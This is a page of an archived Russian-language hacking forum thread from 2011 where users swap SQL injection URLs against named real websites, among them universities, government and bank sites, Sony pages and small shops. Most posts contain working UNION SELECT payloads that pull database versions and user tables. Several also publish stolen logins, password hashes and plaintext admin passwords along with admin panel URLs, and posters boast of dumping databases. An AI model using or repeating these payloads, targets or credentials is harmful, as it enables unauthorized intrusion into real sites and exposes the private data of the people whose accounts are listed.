Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

RE: Ваши Sql-инъекции

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции
Имя
Сообщение << Старые топики   Новые топики >>
RE: Ваши Sql-инъекции - 2011-03-27 19:31:42.686666   
Steep type

Сообщений: 106
Оценки: 0
Присоединился: 2011-02-22 18:27:57.606666
Мне кажется будет лутше выкидывать вот так http://www.arwauniversity.org/sub_ar.php?s_id=-134 и кому надо те сами сделают..От школоты.
Post #: 561
RE: Ваши Sql-инъекции - 2011-03-30 07:04:08.620000   
Jamsho0T

Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
quote:

http://www.arwauniversity.org/sub_ar.php?s_id=-134


http://www.arwauniversity.org/sub_ar.php?s_id=-134+union+select+1,@@version,3,4,5,6,7,8,9%20–

user_name:user_pass:
basem:1234:
anwar:123:
dr.waheeba:123:
Post #: 562
RE: Ваши Sql-инъекции - 2011-03-30 14:04:17.856666   
Jamsho0T

Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
http://www.simeth.org/involved.php?_ID=-1+union+select+@@version%20–

http://www.monoricenter.hu/merchant/myindex.php?_id=-1+union+select+1,@@version,3,4,5,6,7%20–
Post #: 563
RE: Ваши Sql-инъекции - 2011-03-31 09:40:40.813333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.inspiringhomemag.com/v.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11--
ver>5
Post #: 564
RE: Ваши Sql-инъекции - 2011-04-01 18:17:43.376666   
Lord Reigan

Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
защита от школоты
http://www.usclock.net/productdisplay.asp?cattype=c'+%20order%20by%2099&ccatID=9
http://www.hardtofindmusicandmovies.com/productdisplay.asp?idProduct=-1%20union%20select%201,2,3,4,5,6 )))
Post #: 565
RE: Ваши Sql-инъекции - 2011-04-02 08:44:52.420000   
Lord Reigan

Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+25,2–

http://www.fowlgreenfarm.co.uk/admin/index.php - adminka

DES(unix)-шифрование

d.graham@mixd.co.uk:d6U0gZClBpERs:
m.carter@mixd.co.uk:e4HQqdTIwT8x6:password
p.shackleton@mixd.co.uk:f1w5IEt5Pbdjc:
m.danford@mixd.co.uk:5dMVAAguoRx/g:password
info@fowlgreenfarm.co.uk:d0bReI3ryaTzs:commondata

Шел не смог залить так что дерзайте)))))
Незабудет поставить мне +++ )))))


Post #: 566
RE: Ваши Sql-инъекции - 2011-04-04 08:42:54.983333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.corporatedevelopmint.com/team.php ?ID=-1+UNION SELECT 1,2,version(),4,5,6,7,8,9,10--
ver>5
Post #: 567
RE: Ваши Sql-инъекции - 2011-04-04 21:12:46.110000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.inpe.br/noticias/noticia.php?Cod_Noticia=-2486+union+select+1,version(),3--
ver=>4[>:]
Post #: 568
RE: Ваши Sql-инъекции - 2011-04-06 20:55:39.580000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.bfi.org.uk/features/tv/100/list/prog.php ?id=-2+UNION SELECT 1,2,3,4,5,group_concat(id,0x3a,firstname,0x3a,lastname,0x3a,address,0x3a,password,0x3a,email,0x3a,access_level,0x3a),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+adm_users--

http://www.sa-rado.org/prog.php?id=-2%27+UNION%20SELECT%201,version(),3,4--+
Post #: 569
RE: Ваши Sql-инъекции - 2011-04-08 22:35:01.250000   
turyagaman

Сообщений: 26
Оценки: 0
Присоединился: 2011-03-05 07:05:19.046666
http://www.chiroachterolen.be/prog.php?ID=-2+UNION SELECT 1,group_concat(ID,0x2b,voornaam,0x2b,nick,0x2b,PASSWORD,0x2b),3+from+atomos_users--
1 Ben Scott jowjow
Post #: 570
RE: Ваши Sql-инъекции - 2011-04-11 23:00:28.703333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://manual.wpoonline.com/param.php?id=-20+union+select+1,2,^
Post #: 571
RE: Ваши Sql-инъекции - 2011-04-12 20:05:21.493333   
Jamsho0T

Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
http://www.snowboardprofiles.com/pro.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20–

бд - snowboardprofile
слепая , кому надо крутите дальше
Post #: 572
RE: Ваши Sql-инъекции - 2011-04-15 22:42:26.480000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.freepoc.de/viewapp.php?id=-12+UNION+SELECT+1,concat(user(),0x2d,database(),0x2d,version()),3,4,5,6,7,8--
Post #: 573
RE: Ваши Sql-инъекции - 2011-04-24 12:04:30.320000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.attila-meerkamp.nl/trainer.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+ http://www.hollyaiken.com/product.php?category=-27+union+select+1,version(),user(),4,5-- http://www.sparkwestnigeria.com/service.php?id=1&cat_id=-2+union+select+1,2,3--
Post #: 574
RE: Ваши Sql-инъекции - 2011-04-25 17:18:08.176666   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://www.ewrc.cz/ewrc/show.php?id=-1+union+select+concat_ws(0x3a,user(),version(),database())-- - в заголовке.


http://www.cssbeauty.com/jobs/show.php?id=-376+union+select+concat_ws(0x3a,username,password,email)+from+ek_users--
Post #: 575
RE: Ваши Sql-инъекции - 2011-04-26 10:48:37.336666   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://www.nswfb.nsw.gov.au/list.php?id=-43+union+select+1,2,3,4,5,6,7,group_concat%280x3a,table_name%29,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables-- в табличках ничего интересного нет.
Post #: 576
RE: Ваши Sql-инъекции - 2011-04-26 18:25:46.516666   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://central-media.ru/post.php?id=-1+union+select+1,2,3,concat_ws%280x3a,login,password,email%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+persons-- Дамп базы: http://pastehtml.com/view/1e8wum8.html
Post #: 577
RE: Ваши Sql-инъекции - 2011-04-27 16:50:43.050000   
Relapse

Сообщений: 7
Оценки: 0
Присоединился: 2010-04-04 23:49:35.526666
http://2012.net:80/?channel=endoftheworld
Через Havij прет отлично =)
Post #: 578
RE: Ваши Sql-инъекции - 2011-04-29 11:36:57.706666   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
http://www.pakistangrocery.com/product-view.php?productID=-1+UNION+SELECT+version(),2,3 http://www.dmelbsb.com.sg/product-view.php?id=-1+UNION+SELECT+1,2,3,4,version(),6,7,8+--+ http://www.7days.ae/newslist.php?start=100&cat=-1'+UNION+SELECT+1,version(),3,4+--+ <–Интересный сайт, добрался до админки слил всю базу(есть даже кнопка скачать в xls =) ), пароль админа хранился в открытом виде, после того как меня спалили(день назад) в md5
root;e10adc3141ba59abbe56e027f20f818b

http://www.wilmers.co.ke/buycars.php?page=104&bоdуstyle=&make=130&model='+/*!UNION*/+SELECT+1,2,version()+--+ http://www.bambooplantsonline.com/index.php?&cat=-1'+/*!UNION*/+SELECT+1,2,3,version(),5,6,7,8+--+&page=4
Post #: 579
RE: Ваши Sql-инъекции - 2011-05-02 15:26:41.530000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.racingandsports.com.au/racing/rsnewsart.asp?NID=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76+--+
Post #: 580
RE: Ваши Sql-инъекции - 2011-05-03 18:34:36.860000   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
http://www.kupi-tam.com/catalog.php?id=145+and+1=0+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20&id2=147&id3=150 http://www.buycat.ru/albom.php?n=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+--+&foto=1&o=1&alk=1 <– этот сайт создан сектой криворуких кодеров:D Заходим на их сайт 100gig.com, потом в раздел "Наши работы", там смотрим если в списке технологий есть MySQL значит сайт уязвим.
Post #: 581
RE: Ваши Sql-инъекции - 2011-05-05 14:13:01.896666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.expoalta.com.br/2003/n.php?id=-1+UNION SELECT 1,2,^,4,5,6
Post #: 582
RE: Ваши Sql-инъекции - 2011-05-05 19:19:24.850000   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
http://www.subdecay.com/product.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- - в заголовке.

http://www.cyberbody.ru/product.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- http://www.cyberbody.ru/product.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.tables+where+table_schema=0x753232373534--
Post #: 583
RE: Ваши Sql-инъекции - 2011-05-05 19:56:51.450000   
dannote

Сообщений: 5
Оценки: 0
Присоединился: 2011-05-05 19:16:50.633333
Обычные:

http://www.zou.ru/popup0.php?id=1632+limit+0+union+select+concat_ws(0x3a,user(),version(),database()),2,3

http://nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6

http://www.intline.ru/forum.php?confoid=1+limit+0+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4–+

http://unitedagainstracism.org/pages/detail.php?orgID=1+limit+0+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

Blind:

http://www.cbr.ru/regions/RKC.asp?RGN=SP-G'+and+1=1–+
http://www.cbr.ru/regions/RKC.asp?RGN=SP-G'+and+1=2–+
Post #: 584
RE: Ваши Sql-инъекции - 2011-05-06 20:07:21.883333   
GaMeSTeR001

Сообщений: 103
Оценки: 0
Присоединился: 2010-05-04 16:55:31.473333
http://www.stateart.com/works.php?workId=-1+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14+--+ http://www.casatuscany.com/buy/details.php?id=-1+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73+--+
Post #: 585
RE: Ваши Sql-инъекции - 2011-05-09 17:48:46.533333   
Jamsho0T

Сообщений: 6
Оценки: 0
Присоединился: 2009-07-06 15:48:05.823333
http://store-apple.ru/catalog.htm?parent_id=-8

blind крутите сами

ver 5
бд - muhin_apple

если можно скиньте в личку хороший гайд по слепым
Post #: 586
RE: Ваши Sql-инъекции - 2011-05-09 20:54:55.243333   
ZiMMy

Сообщений: 439
Оценки: 0
Присоединился: 2010-06-19 17:04:39.420000
quote:

ORIGINAL: Jamsho0T

если можно скиньте в личку хороший гайд по слепым

Советую юзать для слепых софт, вот например хорошая тулза, сильно облегчает подбор биндов.
Post #: 587
RE: Ваши Sql-инъекции - 2011-05-10 09:36:50.366666   
Lord Reigan

Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
http://www.pathword.kz/index.php?strid=1&fullnews=-1+union+select+1,2,3,4,5,6–+

кто раскрутит подгоните бд.
Post #: 588
RE: Ваши Sql-инъекции - 2011-05-14 11:54:15.993333   
GaMeSTeR_04reg

Сообщений: 69
Оценки: 0
Присоединился: 2010-11-27 18:15:55.573333
http://www.ccp.si/english/izpis.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26+--+ http://www.phoenixfilmfestival.org/pages/contact.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+ http://www.dracoders.com/games.php?id=-1+/*!UNION*/+SELECT+1,2,3,4,version()+--+
Post #: 589
RE: Ваши Sql-инъекции - 2011-05-17 18:34:38.920000   
Lord Reigan

Сообщений: 50
Оценки: 0
Присоединился: 2011-01-02 10:30:12.280000
http://www.aarviencon.com/detail1.php?id=-57+/*!union*/+select+1,table_name,3,4,5+from+information_schema.tables–


http://www.sou-cakovice.cz/detail1.php?id=-1+union/*&lang=*/select+1,2,3,4,5+table_name+information_schema.columns–+
Post #: 590
RE: Ваши Sql-инъекции - 2011-05-18 22:58:07.700000   
Bapukada

Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
http://eromania.ru/main.php?grp=46'

Вообщем, чет я запутался тут … =( Через ордер или груп показывает , что больше либо равно 2 но меньше чем 3… в union+select просит еще вводить столбцы .
Post #: 591
RE: Ваши Sql-инъекции - 2011-05-19 19:27:57.476666   
Bapukada

Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
http://yogacenter.ru/page.php?id=5'
http://www.ipf-light.ru/shop/index.php?categoryID=56'–+)*
http://www.donballon.ru/shop/index.php?id_group=5
http://crazymama.ru/name.php?id_name=221'
http://www.joe-weider.ru/shop.php?op=product&productid=4
http://www.stitchshop.ru/shop/index.php?id=1
http://www.dunloptyres.ru/tyre.php?id=-87'
http://intim-shop.kh.ua/index.php?module=products&view=product&product_id=5'
http://shops.ixi.ua/shop.php?25'+limit+0/+/group+by+50–/
http://ekipirovka.ru/catalog.php?type=5'
Post #: 592
RE: Ваши Sql-инъекции - 2011-05-20 10:04:40.630000   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.hotels.net411.com/info.php?id=-00012+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Post #: 593
RE: Ваши Sql-инъекции - 2011-05-23 08:01:38.080000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.thenichecondo.com/progresshk.php?prog_id=-3 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14

http://www.aaj.tv/kag/segments.php?prog_id=-3 UNION SELECT 1,2,3,4,group_concat(user_id,0x2a,user_name,0x2a,user_password),6,7,8 from users
Post #: 594
RE: Ваши Sql-инъекции - 2011-05-23 11:18:29.950000   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.lcwu.edu.pk/prog_detail.php?prog_id=-3%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16

http://swamisita.com/programs/index.php?prog_id=-3' UNION SELECT @@version,2,3,4,5
Post #: 595
RE: Ваши Sql-инъекции - 2011-05-25 00:24:50.343333   
sepo

Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
http://www.sonymusic.cz/lr-aktuality.php?rid=1&cid='&article=beyonce-4 дальше дело за LulzSec [sm=dont.gif]
Post #: 596
RE: Ваши Sql-инъекции - 2011-05-26 22:24:58.613333   
Bapukada

Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
http://www.viamontenapoleone.org/admin
kiran@kiran.com
abc@123
Post #: 597
RE: Ваши Sql-инъекции - 2011-05-27 10:29:50.586666   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666

quote:

ORIGINAL: sepo

http://www.sonymusic.cz/lr-aktuality.php?rid=1&cid='&article=beyonce-4 дальше дело за LulzSec [sm=dont.gif]



http://www.sonypictures.ru/homevideo/DVDpage.php?dvdId=67'
Согласен
Post #: 598
RE: Ваши Sql-инъекции - 2011-05-28 00:11:48.880000   
Bapukada

Сообщений: 23
Оценки: 0
Присоединился: 2011-01-30 07:05:52.663333
user=admin
pass=giannistaff
http://www.giannistaffparrucchieri.it/admin/login.php
Post #: 599
RE: Ваши Sql-инъекции - 2011-05-30 00:02:08.083333   
webkraft

Сообщений: 2388
Оценки: 95
Присоединился: 2009-03-01 15:59:53.456666
http://www.atlanticchemical.com/product.php?pid=-1+union+select+1,2,group_concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13+from+users
Post #: 600
Страниц:  1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17
Все форумы >> [Уязвимости] >> RE: Ваши Sql-инъекции







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.